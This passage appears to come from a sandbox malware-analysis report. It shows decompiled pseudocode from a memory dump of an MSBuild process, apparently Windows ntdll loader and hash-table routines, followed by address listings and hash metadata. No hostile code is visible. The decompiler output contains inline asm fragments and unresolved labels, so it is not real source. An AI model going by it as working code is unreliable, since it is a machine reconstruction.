											_v16 = _v16 | 0xffffffff;
											_v16 = _v16 << (_t202 & 0x0000001f);
											_t323 = _v16 & _t289;
											_v20 = _t323;
											_v20 = _v20 >> 0x18;
											_v28 = _t323;
											_v28 = _v28 >> 0x10;
											_v12 = _t323;
											_v12 = _v12 >> 8;
											_v32 = _t323;
											if(_t386 != 0) {
												goto L41;
											}
											_t247 = _t202 >> 5;
											_v24 = _t247;
											if(_t247 == 0) {
												_t412 = 0;
												L50:
												if(_t412 == 0) {
													L53:
													_t291 =  *(_t428 + 4);
													_v28 =  *((intOrPtr*)(_t428 + 0x28));
													_v44 =  *(_t428 + 0x24);
													_v32 =  *((intOrPtr*)(_t428 + 0x20));
													_t207 = _t291 >> 5;
													if( *_t428 < _t207 + _t207) {
														L74:
														_t430 = _t291 >> 5;
														_t293 = _v36;
														_t210 = (_t207 | 0xffffffff) << (_t291 & 0x0000001f) &  *(_t293 + 4);
														_v44 = _t210;
														_t159 = _t430 - 1; // 0xffffffdf
														_t428 = _v40;
														_t330 =  *(_t428 + 8);
														_t386 = _t159 & (_v44 >> 0x00000018) + ((_v44 >> 0x00000010 & 0x000000ff) + ((_t210 >> 0x00000008 & 0x000000ff) + ((_t210 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
														_t412 = _t293;
														 *_t293 =  *(_t330 + _t386 * 4);
														 *(_t330 + _t386 * 4) = _t293;
														 *_t428 =  *_t428 + 1;
														_t289 = 0;
														L75:
														E010BFFB0(_t289, _t412, _t428 + 0x1c);
														if(_t289 != 0) {
															_t428 =  *(_t428 + 0x24);
															 *0x119b1e0(_t289,  *((intOrPtr*)(_t428 + 0x28)));
															 *_t428();
														}
														L77:
														return E010EB640(_t412, _t289, _v8 ^ _t433, _t386, _t412, _t428);
													}
													_t334 = 2;
													_t207 = E010DF3D5( &_v24, _t207 * _t334, _t207 * _t334 >> 0x20);
													if(_t207 < 0) {
														goto L74;
													}
													_t413 = _v24;
													if(_t413 < 4) {
														_t413 = 4;
													}
													 *0x119b1e0(_t413 << 2, _v28);
													_t207 =  *_v32();
													_t386 = _t207;
													_v16 = _t386;
													if(_t386 == 0) {
														_t291 =  *(_t428 + 4);
														if(_t291 >= 0x20) {
															goto L74;
														}
														_t289 = _v36;
														_t412 = 0;
														goto L75;
													} else {
														_t108 = _t413 - 1; // 0x3
														_t337 = _t108;
														if((_t413 & _t337) == 0) {
															L62:
															if(_t413 > 0x4000000) {
																_t413 = 0x4000000;
															}
															_t295 = _t386;
															_v24 = _v24 & 0x00000000;
															_t392 = _t413 << 2;
															_t230 = _t428 | 0x00000001;
															_t393 = _t392 >> 2;
															asm("sbb ecx, ecx");
															_t341 =  !(_v16 + _t392) & _t393;
															if(_t341 <= 0) {
																L67:
																_t395 = (_t393 | 0xffffffff) << ( *(_t428 + 4) & 0x0000001f);
																_v32 = _t395;
																_v20 = 0;
																if(( *(_t428 + 4) & 0xffffffe0) <= 0) {
																	L72:
																	_t345 =  *(_t428 + 8);
																	_t207 = _v16;
																	_t291 =  *(_t428 + 4) & 0x0000001f | _t413 << 0x00000005;
																	 *(_t428 + 8) = _t207;
																	 *(_t428 + 4) = _t291;
																	if(_t345 != 0) {
																		 *0x119b1e0(_t345, _v28);
																		_t207 =  *_v44();
																		_t291 =  *(_t428 + 4);
																	}
																	goto L74;
																} else {
																	goto L68;
																}
																do {
																	L68:
																	_t298 =  *(_t428 + 8);
																	_t431 = _v20;
																	_v12 = _t298;
																	while(1) {
																		_t347 =  *(_t298 + _t431 * 4);
																		_v24 = _t347;
																		if((_t347 & 0x00000001) != 0) {
																			goto L71;
																		}
																		 *(_t298 + _t431 * 4) =  *_t347;
																		_t300 =  *(_t347 + 4) & _t395;
																		_t398 = _v16;
																		_t353 = _t413 - 0x00000001 & (( *(_t347 + 4) & _t395) >> 0x00000018) + ((( *(_t347 + 4) & _t395) >> 0x00000010 & 0x000000ff) + ((( *(_t347 + 4) & _t395) >> 0x00000008 & 0x000000ff) + ((_t300 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
																		_t303 = _v24;
																		 *_t303 =  *((intOrPtr*)(_t398 + _t353 * 4));
																		 *((intOrPtr*)(_t398 + _t353 * 4)) = _t303;
																		_t395 = _v32;
																		_t298 = _v12;
																	}
																	L71:
																	_v20 = _t431 + 1;
																	_t428 = _v40;
																} while (_v20 <  *(_t428 + 4) >> 5);
																goto L72;
															} else {
																_t399 = _v24;
																do {
																	_t399 = _t399 + 1;
																	 *_t295 = _t230;
																	_t295 = _t295 + 4;
																} while (_t399 < _t341);
																goto L67;
															}
														}
														_t354 = _t337 | 0xffffffff;
														if(_t413 == 0) {
															L61:
															_t413 = 1 << _t354;
															goto L62;
														} else {
															goto L60;
														}
														do {
															L60:
															_t354 = _t354 + 1;
															_t413 = _t413 >> 1;
														} while (_t413 != 0);
														goto L61;
													}
												}
												_t89 = _t412 + 8; // 0x8
												_t244 = E0117E7A8(_t89);
												_t289 = _v36;
												if(_t244 == 0) {
													_t412 = 0;
												}
												goto L75;
											}
											_t386 =  *(_t428 + 8) + (_v24 - 0x00000001 & (_v20 & 0x000000ff) + 0x164b2f3f + (((_t323 & 0x000000ff) * 0x00000025 + (_v12 & 0x000000ff)) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025) * 4;
											_t323 = _v32;
											while(1) {
												L41:
												_t386 =  *_t386;
												_v12 = _t386;
												if((_t386 & 0x00000001) != 0) {
													break;
												}
												if(_t323 == ( *(_t386 + 4) & _v16)) {
													L45:
													if(_t386 == 0) {
														goto L53;
													}
													if(E0117E7EB(_t386, _t408) != 0) {
														_t412 = _v12;
														goto L50;
													}
													_t386 = _v12;
													goto L38;
												}
											}
											_t386 = 0;
											_v12 = 0;
											goto L45;
										}
									}
									_t412 = 0;
									goto L77;
								}
								_t38 = _t406 + 8; // 0x8
								_t364 = _t38;
								if(E0117E7A8(_t38) == 0) {
									_t406 = 0;
								}
								E010CFA00(_t289, _t364, _t406, _v20);
								goto L77;
							}
							_t24 = _t418 - 1; // -1
							_t385 =  *((intOrPtr*)(_t426 + 8)) + (_t24 & (_v12 & 0x000000ff) + 0x164b2f3f + (((_t316 & 0x000000ff) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025 + (_v36 & 0x000000ff)) * 0x00000025) * 4;
							_t316 = _v32;
							L21:
							_t406 = _v24;
							while(1) {
								_t385 =  *_t385;
								_v12 = _t385;
								if((_t385 & 0x00000001) != 0) {
									break;
								}
								if(_t316 == ( *(_t385 + 4) & _t406)) {
									L26:
									if(_t385 == 0) {
										goto L35;
									}
									_t177 = E0117E7EB(_t385, _v16);
									if(_t177 != 0) {
										_t406 = _v12;
										goto L31;
									}
									_t385 = _v12;
									goto L18;
								}
							}
							_t385 = 0;
							_v12 = 0;
							goto L26;
						}
					}
					_t419 = _t404 - 1;
					if(_t419 == 0) {
						L15:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L16;
					}
					_t420 = _t419 - 1;
					if(_t420 == 0) {
						L14:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L15;
					}
					_t421 = _t420 - 1;
					if(_t421 == 0) {
						L13:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L14;
					}
					_t422 = _t421 - 1;
					if(_t422 == 0) {
						L12:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L13;
					}
					_t423 = _t422 - 1;
					if(_t423 == 0) {
						L11:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L12;
					}
					if(_t423 != 1) {
						goto L17;
					} else {
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L11;
					}
				} else {
					_t401 = _t403 >> 3;
					_t403 = _t403 + _t401 * 0xfffffff8;
					do {
						_t383 = ((((((_t425[1] & 0x000000ff) * 0x25 + (_t425[2] & 0x000000ff)) * 0x25 + (_t425[3] & 0x000000ff)) * 0x25 + (_t425[4] & 0x000000ff)) * 0x25 + (_t425[5] & 0x000000ff)) * 0x25 + (_t425[6] & 0x000000ff)) * 0x25 - _t289 * 0x2fe8ed1f;
						_t310 = ( *_t425 & 0x000000ff) * 0x1a617d0d;
						_t288 = _t425[7] & 0x000000ff;
						_t425 =  &(_t425[8]);
						_t289 = _t310 + _t383 + _t288;
						_t401 = _t401 - 1;
					} while (_t401 != 0);
					goto L3;
				}
			}






































































                                                                                                0x0117e833
                                                                                                0x0117e839
                                                                                                0x0117e83e
                                                                                                0x0117e841
                                                                                                0x0117e848
                                                                                                0x0117e84b
                                                                                                0x0117e851
                                                                                                0x0117e8b2
                                                                                                0x0117e8b2
                                                                                                0x0117e8b5
                                                                                                0x0117e90b
                                                                                                0x0117e911
                                                                                                0x0117e913
                                                                                                0x0117e913
                                                                                                0x0117e91a
                                                                                                0x0117e91d
                                                                                                0x0117e922
                                                                                                0x0117e924
                                                                                                0x0117e924
                                                                                                0x0117e924
                                                                                                0x0117e92f
                                                                                                0x0117e933
                                                                                                0x0117e935
                                                                                                0x0117e93a
                                                                                                0x0117e940
                                                                                                0x0117e948
                                                                                                0x0117e950
                                                                                                0x0117e955
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0117e957
                                                                                                0x0117e95c
                                                                                                0x0117e9cb
                                                                                                0x0117e9d2
                                                                                                0x0117e9d4
                                                                                                0x0117e9f2
                                                                                                0x0117e9f6
                                                                                                0x0117ea10
                                                                                                0x0117ea18
                                                                                                0x0117ea1a
                                                                                                0x0117ea1f
                                                                                                0x0117ea2c
                                                                                                0x0117ea2d
                                                                                                0x0117ea2e
                                                                                                0x0117ea32
                                                                                                0x0117ea3d
                                                                                                0x0117ea42
                                                                                                0x0117ea45
                                                                                                0x0117ea51
                                                                                                0x0117ea60
                                                                                                0x0117ea65
                                                                                                0x0117ea68
                                                                                                0x0117ea6a
                                                                                                0x0117ea6a
                                                                                                0x0117ea6a
                                                                                                0x0117ea6f
                                                                                                0x0117ea76
                                                                                                0x0117ea7c
                                                                                                0x0117ea7e
                                                                                                0x0117ea81
                                                                                                0x0117ea85
                                                                                                0x0117ea88
                                                                                                0x0117ea8c
                                                                                                0x0117ea8f
                                                                                                0x0117ea93
                                                                                                0x0117ea98
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0117ea9a
                                                                                                0x0117ea9d
                                                                                                0x0117eaa2
                                                                                                0x0117eb0e
                                                                                                0x0117eb15
                                                                                                0x0117eb17
                                                                                                0x0117eb33
                                                                                                0x0117eb36
                                                                                                0x0117eb39
                                                                                                0x0117eb3f
                                                                                                0x0117eb45
                                                                                                0x0117eb4a
                                                                                                0x0117eb52
                                                                                                0x0117ecb1
                                                                                                0x0117ecb9
                                                                                                0x0117ecbe
                                                                                                0x0117ecc3
                                                                                                0x0117ecc6
                                                                                                0x0117eceb
                                                                                                0x0117ecee
                                                                                                0x0117ecf9
                                                                                                0x0117ecfe
                                                                                                0x0117ed00
                                                                                                0x0117ed05
                                                                                                0x0117ed07
                                                                                                0x0117ed0a
                                                                                                0x0117ed0c
                                                                                                0x0117ed0e
                                                                                                0x0117ed12
                                                                                                0x0117ed19
                                                                                                0x0117ed1e
                                                                                                0x0117ed24
                                                                                                0x0117ed2a
                                                                                                0x0117ed2a
                                                                                                0x0117ed2c
                                                                                                0x0117ed3e
                                                                                                0x0117ed3e
                                                                                                0x0117eb5a
                                                                                                0x0117eb62
                                                                                                0x0117eb69
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0117eb6f
                                                                                                0x0117eb75
                                                                                                0x0117eb79
                                                                                                0x0117eb79
                                                                                                0x0117eb88
                                                                                                0x0117eb8e
                                                                                                0x0117eb90
                                                                                                0x0117eb92
                                                                                                0x0117eb97
                                                                                                0x0117ed3f
                                                                                                0x0117ed45
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0117ed4b
                                                                                                0x0117ed4e
                                                                                                0x00000000
                                                                                                0x0117eb9d
                                                                                                0x0117eb9d
                                                                                                0x0117eb9d
                                                                                                0x0117eba2
                                                                                                0x0117ebb5
                                                                                                0x0117ebbc
                                                                                                0x0117ebbe
                                                                                                0x0117ebbe
                                                                                                0x0117ebc3
                                                                                                0x0117ebc5
                                                                                                0x0117ebcb
                                                                                                0x0117ebd2
                                                                                                0x0117ebd5
                                                                                                0x0117ebdb
                                                                                                0x0117ebdf
                                                                                                0x0117ebe1
                                                                                                0x0117ebf0
                                                                                                0x0117ebf9
                                                                                                0x0117ec04
                                                                                                0x0117ec07
                                                                                                0x0117ec0a
                                                                                                0x0117ec82
                                                                                                0x0117ec85
                                                                                                0x0117ec8b
                                                                                                0x0117ec91
                                                                                                0x0117ec93
                                                                                                0x0117ec96
                                                                                                0x0117ec9b
                                                                                                0x0117eca6
                                                                                                0x0117ecac
                                                                                                0x0117ecae
                                                                                                0x0117ecae
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0117ec0c
                                                                                                0x0117ec0c
                                                                                                0x0117ec0c
                                                                                                0x0117ec0f
                                                                                                0x0117ec12
                                                                                                0x0117ec15
                                                                                                0x0117ec15
                                                                                                0x0117ec18
                                                                                                0x0117ec1e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0117ec22
                                                                                                0x0117ec28
                                                                                                0x0117ec4b
                                                                                                0x0117ec5b
                                                                                                0x0117ec5d
                                                                                                0x0117ec63
                                                                                                0x0117ec65
                                                                                                0x0117ec68
                                                                                                0x0117ec6b
                                                                                                0x0117ec6b
                                                                                                0x0117ec70
                                                                                                0x0117ec71
                                                                                                0x0117ec74
                                                                                                0x0117ec7d
                                                                                                0x00000000
                                                                                                0x0117ebe3
                                                                                                0x0117ebe3
                                                                                                0x0117ebe6
                                                                                                0x0117ebe6
                                                                                                0x0117ebe7
                                                                                                0x0117ebe9
                                                                                                0x0117ebec
                                                                                                0x00000000
                                                                                                0x0117ebe6
                                                                                                0x0117ebe1
                                                                                                0x0117eba4
                                                                                                0x0117eba9
                                                                                                0x0117ebb0
                                                                                                0x0117ebb3
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0117ebab
                                                                                                0x0117ebab
                                                                                                0x0117ebab
                                                                                                0x0117ebac
                                                                                                0x0117ebac
                                                                                                0x00000000
                                                                                                0x0117ebab
                                                                                                0x0117eb97
                                                                                                0x0117eb19
                                                                                                0x0117eb1c
                                                                                                0x0117eb21
                                                                                                0x0117eb26
                                                                                                0x0117eb2c
                                                                                                0x0117eb2c
                                                                                                0x00000000
                                                                                                0x0117eb26
                                                                                                0x0117ead6
                                                                                                0x0117ead9
                                                                                                0x0117eadc
                                                                                                0x0117eadc
                                                                                                0x0117eadc
                                                                                                0x0117eade
                                                                                                0x0117eae4
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0117eaee
                                                                                                0x0117eaf7
                                                                                                0x0117eaf9
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0117eb04
                                                                                                0x0117eb12
                                                                                                0x00000000
                                                                                                0x0117eb12
                                                                                                0x0117eb06
                                                                                                0x00000000
                                                                                                0x0117eb06
                                                                                                0x0117eaf0
                                                                                                0x0117eaf2
                                                                                                0x0117eaf4
                                                                                                0x00000000
                                                                                                0x0117eaf4
                                                                                                0x0117ea6a
                                                                                                0x0117ea21
                                                                                                0x00000000
                                                                                                0x0117ea21
                                                                                                0x0117e9d6
                                                                                                0x0117e9d6
                                                                                                0x0117e9e0
                                                                                                0x0117e9e2
                                                                                                0x0117e9e2
                                                                                                0x0117e9e8
                                                                                                0x00000000
                                                                                                0x0117e9e8
                                                                                                0x0117e987
                                                                                                0x0117e98f
                                                                                                0x0117e992
                                                                                                0x0117e995
                                                                                                0x0117e995
                                                                                                0x0117e998
                                                                                                0x0117e998
                                                                                                0x0117e99a
                                                                                                0x0117e9a0
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0117e9a9
                                                                                                0x0117e9b2
                                                                                                0x0117e9b4
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0117e9ba
                                                                                                0x0117e9c1
                                                                                                0x0117e9cf
                                                                                                0x00000000
                                                                                                0x0117e9cf
                                                                                                0x0117e9c3
                                                                                                0x00000000
                                                                                                0x0117e9c3
                                                                                                0x0117e9ab
                                                                                                0x0117e9ad
                                                                                                0x0117e9af
                                                                                                0x00000000
                                                                                                0x0117e9af
                                                                                                0x0117e924
                                                                                                0x0117e8b7
                                                                                                0x0117e8ba
                                                                                                0x0117e902
                                                                                                0x0117e908
                                                                                                0x0117e90a
                                                                                                0x00000000
                                                                                                0x0117e90a
                                                                                                0x0117e8bc
                                                                                                0x0117e8bf
                                                                                                0x0117e8f9
                                                                                                0x0117e8ff
                                                                                                0x0117e901
                                                                                                0x00000000
                                                                                                0x0117e901
                                                                                                0x0117e8c1
                                                                                                0x0117e8c4
                                                                                                0x0117e8f0
                                                                                                0x0117e8f6
                                                                                                0x0117e8f8
                                                                                                0x00000000
                                                                                                0x0117e8f8
                                                                                                0x0117e8c6
                                                                                                0x0117e8c9
                                                                                                0x0117e8e7
                                                                                                0x0117e8ed
                                                                                                0x0117e8ef
                                                                                                0x00000000
                                                                                                0x0117e8ef
                                                                                                0x0117e8cb
                                                                                                0x0117e8ce
                                                                                                0x0117e8de
                                                                                                0x0117e8e4
                                                                                                0x0117e8e6
                                                                                                0x00000000
                                                                                                0x0117e8e6
                                                                                                0x0117e8d3
                                                                                                0x00000000
                                                                                                0x0117e8d5
                                                                                                0x0117e8db
                                                                                                0x0117e8dd
                                                                                                0x00000000
                                                                                                0x0117e8dd
                                                                                                0x0117e853
                                                                                                0x0117e855
                                                                                                0x0117e85b
                                                                                                0x0117e85d
                                                                                                0x0117e897
                                                                                                0x0117e89c
                                                                                                0x0117e8a2
                                                                                                0x0117e8a6
                                                                                                0x0117e8ab
                                                                                                0x0117e8ad
                                                                                                0x0117e8ad
                                                                                                0x00000000
                                                                                                0x0117e85d

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID: DebugPrintTimes
                                                                                                • String ID:
                                                                                                • API String ID: 3446177414-0
                                                                                                • Opcode ID: 18dbc8198690067f59aad5f1477b3ed623b01677dd916c34bbfab7034679f8f7
                                                                                                • Instruction ID: 110c59748e201c16c6cf8367ef9342e677688ff18af8b7ed2fc2c2dd3ae1264b
                                                                                                • Opcode Fuzzy Hash: 18dbc8198690067f59aad5f1477b3ed623b01677dd916c34bbfab7034679f8f7
                                                                                                • Instruction Fuzzy Hash: 9D02A272E006169BCB1CCF6DC8916BEFBF6AF88200B5981ADD456DB381D734E941CB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010B8794 Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 83%
                                                                                                			E010B8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E010B934A() != 0) {
								_t159 = E0112A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x1195780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E01125510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x1195780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E010B849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E010B8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E010B8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x1195c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x1195c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E010C2280(_t92, 0x11986cc);
															_t94 = E01179DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E010D61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x1195c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E010B8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x1195c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x1195c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E010EF380(_t136, 0x1081184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E010C2280(_t108, 0x11986cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E010D61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E01179D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E010BFFB0(_t118, _t156, 0x11986cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E010E9A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                                                                                0x010b8799
                                                                                                0x010b879d
                                                                                                0x010b87a1
                                                                                                0x010b87a3
                                                                                                0x010b87a8
                                                                                                0x010b87c3
                                                                                                0x010b87c3
                                                                                                0x010b87c8
                                                                                                0x010b87d1
                                                                                                0x010b87d4
                                                                                                0x010b87d8
                                                                                                0x010b87e5
                                                                                                0x010b87ec
                                                                                                0x01109bfe
                                                                                                0x01109c00
                                                                                                0x01109c02
                                                                                                0x01109c08
                                                                                                0x01109c0d
                                                                                                0x01109c0f
                                                                                                0x01109c14
                                                                                                0x01109c2d
                                                                                                0x01109c32
                                                                                                0x01109c37
                                                                                                0x01109c3a
                                                                                                0x01109c3c
                                                                                                0x01109c42
                                                                                                0x01109c42
                                                                                                0x01109c3c
                                                                                                0x01109c02
                                                                                                0x010b87da
                                                                                                0x010b87df
                                                                                                0x010b87e3
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010b87e3
                                                                                                0x010b87f2
                                                                                                0x00000000
                                                                                                0x010b87fb
                                                                                                0x010b87fd
                                                                                                0x010b87fe
                                                                                                0x010b880e
                                                                                                0x010b880f
                                                                                                0x010b8810
                                                                                                0x010b8814
                                                                                                0x010b881a
                                                                                                0x010b881c
                                                                                                0x010b881f
                                                                                                0x010b8821
                                                                                                0x010b8822
                                                                                                0x010b8824
                                                                                                0x010b8826
                                                                                                0x010b882c
                                                                                                0x010b882e
                                                                                                0x01109c48
                                                                                                0x01109c48
                                                                                                0x010b8834
                                                                                                0x010b8834
                                                                                                0x010b8837
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010b8837
                                                                                                0x010b882e
                                                                                                0x010b883d
                                                                                                0x010b8840
                                                                                                0x010b8843
                                                                                                0x010b8846
                                                                                                0x010b8849
                                                                                                0x010b884c
                                                                                                0x010b884e
                                                                                                0x010b8850
                                                                                                0x010b8852
                                                                                                0x010b8854
                                                                                                0x010b8857
                                                                                                0x010b88b4
                                                                                                0x010b88b6
                                                                                                0x010b88b6
                                                                                                0x010b8859
                                                                                                0x010b8859
                                                                                                0x010b8859
                                                                                                0x010b8861
                                                                                                0x010b8866
                                                                                                0x010b886a
                                                                                                0x010b893d
                                                                                                0x010b8941
                                                                                                0x00000000
                                                                                                0x010b8947
                                                                                                0x010b8947
                                                                                                0x010b894a
                                                                                                0x010b894c
                                                                                                0x00000000
                                                                                                0x010b8952
                                                                                                0x010b8955
                                                                                                0x010b895a
                                                                                                0x010b895d
                                                                                                0x010b895d
                                                                                                0x010b895f
                                                                                                0x010b8961
                                                                                                0x010b8961
                                                                                                0x010b8968
